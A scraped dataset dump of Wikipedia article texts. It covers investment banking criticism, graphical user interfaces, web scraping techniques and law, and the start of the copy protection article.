Frankfurt, Hong Kong, Singapore, and Tokyo. The majority of the world's largest Bulge Bracket investment banks and their investment managers are headquartered in New York and are also important participants in other financial centers. 32 The city of London has historically served as a hub of European M A activity, often facilitating the most capital movement and corporate restructuring in the area. 33 34 Meanwhile, Asian cities are receiving a growing share of M A activity. According to estimates published by the International Financial Services London, for the decade prior to the financial crisis in 2008, M A was a primary source of investment banking revenue, often accounting for 40% of such revenue, but dropped during and after the financial crisis. 30 : 9 Equity underwriting revenue ranged from 30% to 38%, and fixed-income underwriting accounted for the remaining revenue. 30 : 9 Revenues have been affected by the introduction of new products with higher margins; however, these innovations are often copied quickly by competing banks, pushing down trading margins. For example, brokerages commissions for bond and equity trading is a commodity business, but structuring and trading derivatives have higher margins because each over-the-counter contract has to be uniquely structured and could involve complex pay-off and risk profiles. One growth area is private investment in public equity (PIPEs, otherwise known as Regulation D or Regulation S). Such transactions are privately negotiated between companies and accredited investors. Banks also earned revenue by securitizing debt, particularly mortgage debt prior to the financial crisis. Investment banks have become concerned that lenders are securitizing in-house, driving the investment banks to pursue vertical integration by becoming lenders, which has been allowed in the United States since the repeal of the Glass Steagall Act in 1999. 35 According to The Wall Street Journal, in terms of total M A advisory fees for the whole of 2020, the top ten investment banks were as listed in the table below. 36 Many of these firms belong either to the Bulge Bracket (upper tier), Middle Market (mid-level businesses), or are elite boutique investment banks (independent advisory investment banks). The above list is just a ranking of the advisory arm (M A advisory, syndicated loans, equity capital markets, and debt capital markets) of each bank and does not include the generally much larger portion of revenues from sales trading and asset management. Mergers and acquisitions and capital markets are also often covered by The Wall Street Journal and Bloomberg. The financial crisis of 2007 2008 led to the collapse of several notable investment banks, such as the bankruptcy of Lehman Brothers (one of the largest investment banks in the world) and the hurried fire sale of Merrill Lynch and the much smaller Bear Stearns to much larger banks, which effectively rescued them from bankruptcy. The entire financial services industry, including numerous investment banks, was bailed out by government taxpayer funded loans through the Troubled Asset Relief Program (TARP). Surviving U.S. investment banks such as Goldman Sachs and Morgan Stanley converted to traditional bank holding companies to accept TARP relief. 38 Similar situations have occurred across the globe with countries rescuing their banking industry. Initially, banks received part of a $700 billion TARP intended to stabilize the economy and thaw the frozen credit markets. 39 Eventually, taxpayer assistance to banks reached nearly $13 trillion—most without much scrutiny— 40 lending did not increase, 41 and credit markets remained frozen. 42 The crisis led to questioning of the investment banking business model 43 without the regulation imposed on it by Glass Steagall. neutrality is disputed Once Robert Rubin, a former co-chairman of Goldman Sachs, became part of the Clinton administration and deregulated banks, the previous conservatism of underwriting established companies and seeking long-term gains was replaced by lower standards and short-term profit. 44 Formerly, the guidelines said that in order to take a company public, it had to be in business for a minimum of five years and it had to show profitability for three consecutive years. After deregulation, those standards were gone, but small investors did not grasp the full impact of the change. 44 A number of former Goldman Sachs top executives, such as Henry Paulson and Ed Liddy, were in high-level positions in government and oversaw the controversial taxpayer-funded bank bailout. 44 The TARP Oversight Report released by the Congressional Oversight Panel found that the bailout tended to encourage risky behavior and "corrupt ed the fundamental tenets of a market economy". 45 Under threat of a subpoena, Goldman Sachs revealed that it received $12.9 billion in taxpayer aid, $4.3 billion of which was then paid out to 32 entities, including many overseas banks, hedge funds, and pensions. 46 The same year it received $10 billion in aid from the government, it also paid out multimillion-dollar bonuses; the total paid in bonuses was $4.82 billion. 47 48 Similarly, Morgan Stanley received $10 billion in TARP funds and paid out $4.475 billion in bonuses. 49 The investment banking industry, including boutique investment banks, have come under criticism for a variety of reasons, including perceived conflicts of interest, overly large pay packages, cartel-like or oligopolistic behavior, taking both sides in transactions, and more. 50 Investment banking has also been criticized for its opacity. 51 However, the lack of transparency inherent to the investment banking industry is largely due to the necessity to abide by the non-disclosure agreement (NDA) signed with the client. The accidental leak of confidential client data can cause a bank to incur significant monetary losses. Conflicts of interest may arise between different parts of a bank, creating the potential for market manipulation, according to critics. Authorities that regulate investment banking, such as the Financial Conduct Authority (FCA) in the United Kingdom and the SEC in the United States, require that banks impose a "Chinese wall" to prevent communication between investment banking on one side and equity research and trading on the other. However, critics say such a barrier does not always exist in practice. Independent advisory firms that exclusively provide corporate finance advice argue that their advice is not conflicted, unlike bulge bracket banks. Conflicts of interest often arise in relation to investment banks' equity research units, which have long been part of the industry. A common practice is for equity analysts to initiate coverage of a company to develop relationships that lead to highly profitable investment banking business. In the 1990s, many equity researchers allegedly traded positive stock ratings for investment banking business. Alternatively, companies may threaten to divert investment banking business to competitors unless their stock was rated favorably. Laws were passed to criminalize such acts, and increased pressure from regulators and a series of lawsuits, settlements, and prosecutions curbed this business to a large extent following the 2001 stock market tumble after the dot-com bubble. Philip Augar, author of The Greed Merchants, said in an interview that, "You cannot simultaneously serve the interest of issuer clients and investing clients. And it’s not just underwriting and sales; investment banks run proprietary trading operations that are also making a profit out of these securities. 50 Many investment banks also own retail brokerages. During the 1990s, some retail brokerages sold consumers securities which did not meet their stated risk profile. This behavior may have led to investment banking business or even sales of surplus shares during a public offering to keep public perception of the stock favorable. Since investment banks engage heavily in trading for their own account, there is always the temptation for them to engage in some form of front running—the illegal practice whereby a broker executes orders for their own account before filling orders previously submitted by their customers, thereby benefiting from any changes in prices induced by those orders. Documents under seal in a decade-long lawsuit concerning eToys.com's IPO but obtained by New York Times' Wall Street Business columnist Joe Nocera alleged that IPOs managed by Goldman Sachs and other investment bankers involved asking for kickbacks from their institutional clients who made large profits flipping IPOs which Goldman had intentionally undervalued. Depositions in the lawsuit alleged that clients willingly complied with these demands because they understood it was necessary to participate in future hot issues. 52 Reuters Wall Street correspondent Felix Salmon retracted his earlier, more conciliatory statements on the subject and said he believed that the depositions show that companies going public and their initial consumer stockholders are both defrauded by this practice, which may be widespread throughout the IPO finance industry. 53 The case is ongoing, and the allegations remain unproven. Nevertheless, the controversy around investment banks intentionally underpricing IPOs for their self-interest has become a highly debated subject. The cause for concern is that the investment banks advising on the IPOs have the incentive to serve institutional investors on the buy-side, creating a valid reason for a potential conflict of interest. 54 The post-IPO spike in the stock price of newly listed companies has only worsened the problem, with one of the leading critics being high-profile venture capital (VC) investor, Bill Gurley. 55 Investment banking has been criticized for the enormous pay packages awarded to those who work in the industry. According to Bloomberg Wall Street's five biggest firms paid over $3 billion to their executives from 2003 to 2008, "while they presided over the packaging and sale of loans that helped bring down the investment-banking system". 56 In 2003 2007, pay packages included $172 million for Merrill Lynch CEO Stanley O'Neal before the bank was bought by Bank of America, and $161 million for Bear Stearns' James Cayne before the bank collapsed and was sold to JPMorgan Chase. 56 Such pay arrangements attracted the ire of Democrats and Republicans in the United States Congress, who demanded limits on executive pay in 2008 when the U.S. government was bailing out the industry with a $700 billion financial rescue package. 56 Writing in the Global Association of Risk Professionals journal, Aaron Brown, a vice president at Morgan Stanley, says "By any standard of human fairness, of course, investment bankers make obscene amounts of money. 50 |
217 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/GUI | A graphical user interface, or GUI ( u i 1 2 GOO-ee), is a form of user interface that allows users to interact with electronic devices through graphical icons and visual indicators such as secondary notation. In many applications, GUIs are used instead of text-based UIs, which are based on typed command labels or text navigation. GUIs were introduced in reaction to the perceived steep learning curve of command-line interfaces (CLIs), 3 4 5 which require commands to be typed on a computer keyboard. The actions in a GUI are usually performed through direct manipulation of the graphical elements. 6 7 8 Beyond computers, GUIs are used in many handheld mobile devices such as MP3 players, portable media players, gaming devices, smartphones and smaller household, office and industrial controls. The term GUI tends not to be applied to other lower-display resolution types of interfaces, such as video games (where head-up displays (HUDs) 9 are preferred), or not including flat screens like volumetric displays 10 because the term is restricted to the scope of 2D display screens able to describe generic information, in the tradition of the computer science research at the Xerox Palo Alto Research Center. Designing the visual composition and temporal behavior of a GUI is an important part of software application programming in the area of human computer interaction. Its goal is to enhance the efficiency and ease of use for the underlying logical design of a stored program, a design discipline named usability. Methods of user-centered design are used to ensure that the visual language introduced in the design is well-tailored to the tasks. The visible graphical interface features of an application are sometimes referred to as chrome or GUI. 11 12 13 Typically, users interact with information by manipulating visual widgets that allow for interactions appropriate to the kind of data they hold. The widgets of a well-designed interface are selected to support the actions necessary to achieve the goals of users. A model view controller allows flexible structures in which the interface is independent of and indirectly linked to application functions, so the GUI can be customized easily. This allows users to select or design a different skin or theme at will, and eases the designer's work to change the interface as user needs evolve. Good GUI design relates to users more, and to system architecture less. Large widgets, such as windows, usually provide a frame or container for the main presentation content such as a web page, email message, or drawing. Smaller ones usually act as a user-input tool. A GUI may be designed for the requirements of a vertical market as application-specific GUIs. Examples include automated teller machines (ATM), point of sale (POS) touchscreens at restaurants, 14 self-service checkouts used in a retail store, airline self-ticket and check-in, information kiosks in a public space, like a train station or a museum, and monitors or control screens in an embedded industrial application which employ a real-time operating system (RTOS). Cell phones and handheld game systems also employ application specific touchscreen GUIs. Newer automobiles use GUIs in their navigation systems and multimedia centers, or navigation multimedia center combinations. A GUI uses a combination of technologies and devices to provide a platform that users can interact with, for the tasks of gathering and producing information. A series of elements conforming a visual language have evolved to represent information stored in computers. This makes it easier for people with few computer skills to work with and use computer software. The most common combination of such elements in GUIs is the windows, icons, text fields, canvases, menus, pointer (WIMP) paradigm, especially in personal computers. 15 The WIMP style of interaction uses a virtual input device to represent the position of a pointing device's interface, most often a mouse, and presents information organized in windows and represented with icons. Available commands are compiled together in menus, and actions are performed making gestures with the pointing device. A window manager facilitates the interactions between windows, applications, and the windowing system. The windowing system handles hardware devices such as pointing devices, graphics hardware, and positioning of the pointer. In personal computers, all these elements are modeled through a desktop metaphor to produce a simulation called a desktop environment in which the display represents a desktop, on which documents and folders of documents can be placed. Window managers and other software combine to simulate the desktop environment with varying degrees of realism. Entries may appear in a list to make space for text and details, or in a grid for compactness and larger icons with little space underneath for text. Variations inbetween exist, such as a list with multiple columns of items and a grid of items with rows of text extending sideways from the icon. 16 Multi-row and multi-column layouts commonly found on the web are "shelf" and "waterfall". The former is found on image search engines, where images appear with a fixed height but variable length, and is typically implemented with the CSS property and parameter display: inline-block;. A waterfall layout found on Imgur and TweetDeck with fixed width but variable height per item is usually implemented by specifying column-width:. Smaller app mobile devices such as personal digital assistants (PDAs) and smartphones typically use the WIMP elements with different unifying metaphors, due to constraints in space and available input devices. Applications for which WIMP is not well suited may use newer interaction techniques, collectively termed post-WIMP UIs. 17 As of 2011, some touchscreen-based operating systems such as Apple's iOS (iPhone) and Android use the class of GUIs named post-WIMP. These support styles of interaction using more than one finger in contact with a display, which allows actions such as pinching and rotating, which are unsupported by one pointer and mouse. 18 Human interface devices, for the efficient interaction with a GUI include a computer keyboard, especially used together with keyboard shortcuts, pointing devices for the cursor (or rather pointer) control: mouse, pointing stick, touchpad, trackball, joystick, virtual keyboards, and head-up displays (translucent information devices at the eye level). There are also actions performed by programs that affect the GUI. For example, there are components like inotify or D-Bus to facilitate communication between computer programs. Ivan Sutherland developed Sketchpad in 1963, widely held as the first graphical computer-aided design program. It used a light pen to create and manipulate objects in engineering drawings in realtime with coordinated graphics. In the late 1960s, researchers at the Stanford Research Institute, led by Douglas Engelbart, developed the On-Line System (NLS), which used text-based hyperlinks manipulated with a then-new device: the mouse. (A 1968 demonstration of NLS became known as "The Mother of All Demos".) In the 1970s, Engelbart's ideas were further refined and extended to graphics by researchers at Xerox PARC and specifically Alan Kay, who went beyond text-based hyperlinks and used a GUI as the main interface for the Smalltalk programming language, which ran on the Xerox Alto computer, released in 1973. Most modern general-purpose GUIs are derived from this system. The Xerox PARC GUI consisted of graphical elements such as windows, menus, radio buttons, and check boxes. The concept of icons was later introduced by David Canfield Smith, who had written a thesis on the subject under the guidance of Kay. 19 20 21 The PARC GUI employs a pointing device along with a keyboard. These aspects can be emphasized by using the alternative term and acronym for windows, icons, menus, pointing device (WIMP). This effort culminated in the 1973 Xerox Alto, the first computer with a GUI, though the system never reached commercial production. The first commercially available computer with a GUI was the 1979 PERQ workstation, manufactured by Three Rivers Computer Corporation. Its design was heavily influenced by the work at Xerox PARC. In 1981, Xerox eventually commercialized the ideas from the Alto in the form of a new and enhanced system the Xerox 8010 Information System more commonly known as the Xerox Star. 22 23 These early systems spurred many other GUI efforts, including Lisp machines by Symbolics and other manufacturers, the Apple Lisa (which presented the concept of menu bar and window controls) in 1983, the Apple Macintosh 128K in 1984, and the Atari ST with Digital Research's GEM, and Commodore Amiga in 1985. Visi On was released in 1983 for the IBM PC compatible computers, but was never popular due to its high hardware demands. 24 Nevertheless, it was a crucial influence on the contemporary development of Microsoft Windows. 25 Apple, Digital Research, IBM and Microsoft used many of Xerox's ideas to develop products, and IBM's Common User Access specifications formed the basis of the GUIs used in Microsoft Windows, IBM OS 2 Presentation Manager, and the Unix Motif toolkit and window manager. These ideas evolved to create the interface found in current versions of Microsoft Windows, and in various desktop environments for Unix-like operating systems, such as macOS and Linux. Thus most current GUIs have largely common idioms. GUIs were a hot topic in the early 1980s. The Apple Lisa was released in 1983, and various windowing systems existed for DOS operating systems (including PC GEM and PC GEOS). Individual applications for many platforms presented their own GUI variants. 26 Despite the GUIs advantages, many reviewers questioned the value of the entire concept, 27 citing hardware limits, and problems in finding compatible software. In 1984, Apple released a television commercial which introduced the Apple Macintosh during the telecast of Super Bowl XVIII by CBS, 28 with allusions to George Orwell's noted novel Nineteen Eighty-Four. The goal of the commercial was to make people think about computers, identifying the user-friendly interface as a personal computer which departed from prior business-oriented systems, 29 and becoming a signature representation of Apple products. 30 In 1985, Commodore released the Amiga 1000, along with Workbench and Kickstart 1.0 (which contained Intuition). This interface ran as a separate task, meaning it was very responsive and, unlike other GUIs of the time, it didn't freeze up when a program was busy. Additionally, it was the first GUI to introduce something resembling Virtual Desktops. Windows 95, accompanied by an extensive marketing campaign, 31 was a major success in the marketplace at launch and shortly became the most popular desktop operating system. 32 In 2007, with the iPhone 33 and later in 2010 with the introduction of the iPad, 34 Apple popularized the post-WIMP style of interaction for multi-touch screens, and those devices were considered to be milestones in the development of mobile devices. 35 36 The GUIs familiar to most people as of the mid-late 2010s are Microsoft Windows, macOS, and the X Window System interfaces for desktop and laptop computers, and Android, Apple's iOS, Symbian, BlackBerry OS, Windows Phone Windows 10 Mobile, Tizen, WebOS, and Firefox OS for handheld (smartphone) devices. 37 38 Since the commands available in command line interfaces can be many, complex operations can be performed using a short sequence of words and symbols. Custom functions may be used to facilitate access to frequent actions. Command-line interfaces are more lightweight, as they only recall information necessary for a task; for example, no preview thumbnails or graphical rendering of web pages. This allows greater efficiency and productivity once many commands are learned. 3 But reaching this level takes some time because the command words may not be easily discoverable or mnemonic. Also, using the command line can become slow and error-prone when users must enter long commands comprising many parameters or several different filenames at once. However, windows, icons, menus, pointer (WIMP) interfaces present users with many widgets that represent and can trigger some of the system's available commands. GUIs can be made quite hard when dialogs are buried deep in a system or moved about to different places during redesigns. Also, icons and dialog boxes are usually harder for users to script. WIMPs extensively use modes, as the meaning of all keys and clicks on specific positions on the screen are redefined all the time. Command-line interfaces use modes only in limited forms, such as for current directory and environment variables. Most modern operating systems provide both a GUI and some level of a CLI, although the GUIs usually receive more attention. GUI wrappers find a way around the command-line interface versions (CLI) of (typically) Linux and Unix-like software applications and their text-based UIs or typed command labels. While command-line or text-based applications allow users to run a program non-interactively, GUI wrappers atop them avoid the steep learning curve of the command-line, which requires commands to be typed on the keyboard. By starting a GUI wrapper, users can intuitively interact with, start, stop, and change its working parameters, through graphical icons and visual indicators of a desktop environment, for example. Applications may also provide both interfaces, and when they do the GUI is usually a WIMP wrapper around the command-line version. This is especially common with applications designed for Unix-like operating systems. The latter used to be implemented first because it allowed the developers to focus exclusively on their product's functionality without bothering about interface details such as designing icons and placing buttons. Designing programs this way also allows users to run the program in a shell script. Many environments and games use the methods of 3D graphics to project 3D GUI objects onto the screen. The use of 3D graphics has become increasingly common in mainstream operating systems (ex. Windows Aero, and Aqua (MacOS)) to create attractive interfaces, termed eye candy (which includes, for example, the use of drop shadows underneath windows and the cursor), or for functional purposes only possible using three dimensions. For example, user switching is represented by rotating a cube with faces representing each user's workspace, and window management is represented via a Rolodex-style flipping mechanism in Windows Vista (see Windows Flip 3D). In both cases, the operating system transforms windows on-the-fly while continuing to update the content of those windows. The GUI is usually WIMP-based, although occasionally other metaphors surface, such as those used in Microsoft Bob, 3dwm, File System Navigator, File System Visualizer, 3D Mailbox, 39 40 and GopherVR. Zooming (ZUI) is a related technology that promises to deliver the representation benefits of 3D environments without their usability drawbacks of orientation problems and hidden objects. In 2006, Hillcrest Labs introduced the first ZUI for television. 41 Other innovations include the menus on the PlayStation 2, the menus on the Xbox, Sun's Project Looking Glass, Metisse, which was similar to Project Looking Glass, 42 BumpTop, where users can manipulate documents and windows with realistic movement and physics as if they were physical documents, Croquet OS, which is built for collaboration, 43 and compositing window managers such as Enlightenment and Compiz. Augmented reality and virtual reality also make use of 3D GUI elements. 44 3D GUIs have appeared in science fiction literature and films, even before certain technologies were feasible or in common use. 45 |
218 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Methods_to_prevent_web_scraping | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
219 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Copy_protection | Copy protection, also known as content protection, copy prevention and copy restriction, is any measure to enforce copyright by preventing the reproduction of software, films, music, and other media. 1 Copy protection is most commonly found on videotapes, DVDs, Blu-ray discs, HD-DVDs, computer software discs, video game discs and cartridges, audio CDs and some VCDs. It also may be incorporated into digitally distributed versions of media and software. Some methods of copy protection have also led to criticism because it caused inconvenience for paying consumers or secretly installed additional or unwanted software to detect copying activities on the consumer's computer. Making copy protection effective while protecting consumer rights remains a problem with media publication. Media corporations have always used the term copy protection, but critics argue that the term tends to sway the public into identifying with the publishers, who favor restriction technologies, rather than with the users. 2 Copy prevention and copy control may be more neutral terms. "Copy protection" is a misnomer for some systems, because any number of copies can be made from an original and all of these copies will work, but only in one computer, or only with one dongle, or only with another device that cannot be easily copied. The term is also often related to, and confused with, the concept of digital restrictions management. Digital restrictions management is a more general term because it includes all sorts of management of works, including copy restrictions. Copy restriction may include measures that are not digital. A more appropriate term may be "technological protection measures" (TPMs), 3 which is often defined as the use of technological tools in order to restrict the use or access to a work. Unauthorized copying and distribution accounted for $2.4 billion per year in lost revenue in the United States alone in 1990, 4 and is assumed to be causing impact on revenues in the music and the video game industry, leading to proposal of stricter copyright laws such as PIPA. Copy protection is most commonly found on videotapes, DVDs, computer software discs, video game discs and cartridges, audio CDs and some VCDs. Many media formats are easy to copy using a machine, allowing consumers to distribute copies to their friends, a practice known as "casual copying". Companies publish works under copyright protection because they believe that the cost of implementing the copy protection will be less than the revenue produced by consumers who buy the product instead of acquiring it through casually copied media. Opponents of copy protection argue that people who obtain free copies only use what they can get for free and would not purchase their own copy if they were unable to obtain 